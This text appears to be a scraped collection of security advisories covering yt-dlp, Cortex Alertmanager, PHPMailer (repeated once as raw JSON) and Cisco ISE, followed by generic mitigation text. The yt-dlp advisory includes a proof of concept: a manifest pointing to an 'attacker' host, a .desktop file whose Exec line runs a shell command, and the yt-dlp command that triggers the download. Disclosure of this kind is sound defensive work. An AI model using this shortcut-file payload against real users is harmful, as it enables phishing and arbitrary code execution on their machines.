Vulnerability from github – Published: 2026-06-16 20:59 – Updated: 2026-07-20 13:45Summary
A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.
Details
The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.
Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.
Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.
While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.
Proof of Concept
1. Start a malicious server:
Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:
#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"
And host the payload.desktop file with malicious content:
[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle
2. Trigger the download:
In this case, the generic extractor triggers the exploit if the --write-subs option is used:
yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"
Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.
Patches
yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.
Workarounds
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
Users who are not able to upgrade should do ALL of the following:
- Only pass fully trusted input URLs to yt-dlp
- Do not use the
--write-subs,--write-auto-subs,--embed-subs,--write-thumbnail,--write-all-thumbnails, or--embed-thumbnailoptions - Use
--format -to interactively select download formats and validate their file extensions

Vulnerability from github – Published: 2022-12-19 21:09 – Updated: 2023-10-02 11:04Impact
A local file inclusion vulnerability exists in Cortex versions v1.13.0, v1.13.1 and v1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Cortex Alertmanager service using -experimental.alertmanager.enable-api or enable_api: true are affected.
Specific Go Packages Affected
github.com/cortexproject/cortex/pkg/alertmanager
Patches
Affected Cortex users are advised to upgrade to versions 1.13.2 or 1.14.1.
Workarounds
Patching is ultimately advised. Using out-of-bound validation, Cortex administrators may reject Alertmanager configurations containing the api_key_file setting in the opsgenie_configs section and opsgenie_api_key_file in the global section before sending to the Set Alertmanager Configuration API as a workaround.

GHSA-M298-FH5C-JC66
Vulnerability from github – Published: 2021-05-04 17:42 – Updated: 2026-07-21 13:42Impact
This is a reintroduction of an earlier issue (CVE-2018-19296) by an unrelated bug fix in PHPMailer 6.1.8. An external file may be unexpectedly executable if it is used as a path to an attachment file via PHP's support for .phar files. Exploitation requires that an attacker is able to provide an unfiltered path to a file to attach, or to trick calling code into generating one. See this article for more info.
Patches
This issue was patched in the PHPMailer 6.4.1 release. This release also implements stricter filtering for attachment paths; paths that look like any kind of URL are rejected.
Workarounds
Validate paths to loaded files using the same pattern as used in isPermittedPath() before using them in any PHP file function, such as file_exists. This method can't be used directly because it is protected, but you can implement the same thing in calling code. Note that this should be applied to all user-supplied paths passed into such functions; it's not a problem specific to PHPMailer.
Credit
This issue was found by Fariskhi Vidyan, reported and managed via Tidelift.

"details": "### Impact\nThis is a reintroduction of an earlier issue (CVE-2018-19296) by an unrelated bug fix in PHPMailer 6.1.8. An external file may be unexpectedly executable if it is used as a path to an attachment file via PHP\u0027s support for `.phar` files. Exploitation requires that an attacker is able to provide an unfiltered path to a file to attach, or to trick calling code into generating one. See [this article](https://knasmueller.net/5-answers-about-php-phar-exploitation) for more info.\n\n### Patches\nThis issue was patched in the PHPMailer 6.4.1 release. This release also implements stricter filtering for attachment paths; paths that look like *any* kind of URL are rejected.\n\n### Workarounds\nValidate paths to loaded files using the same pattern as used in [`isPermittedPath()`](https://github.com/PHPMailer/PHPMailer/blob/master/src/PHPMailer.php#L1815) before using them in *any* PHP file function, such as `file_exists`. This method can\u0027t be used directly because it is protected, but you can implement the same thing in calling code. Note that this should be applied to *all* user-supplied paths passed into such functions; it\u0027s not a problem specific to PHPMailer.\n\n### Credit\nThis issue was found by [Fariskhi Vidyan](https://github.com/farisv), reported and managed via Tidelift.",

Vulnerability from github – Published: 2026-09-16 21:32 – Updated: 2026-09-16 21:32A vulnerability in Cisco ISE could allow an authenticated, remote attacker to obtain write access on the underlying operating system of an affected device.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain write access to the underlying operating system. To exploit this vulnerability, the attacker must have valid administrative credentials. Note: For CVE-2026-20282, Cisco has assigned a Security Impact Rating (SIR) of High rather than Medium as the score indicates. The reason is that it is easy to get to root from the achieved privilege level.

Mitigation
Do not allow users to control names of resources used on the server side.
Mitigation
Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them.
Mitigation
Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed.
No CAPEC attack patterns related to this CWE.
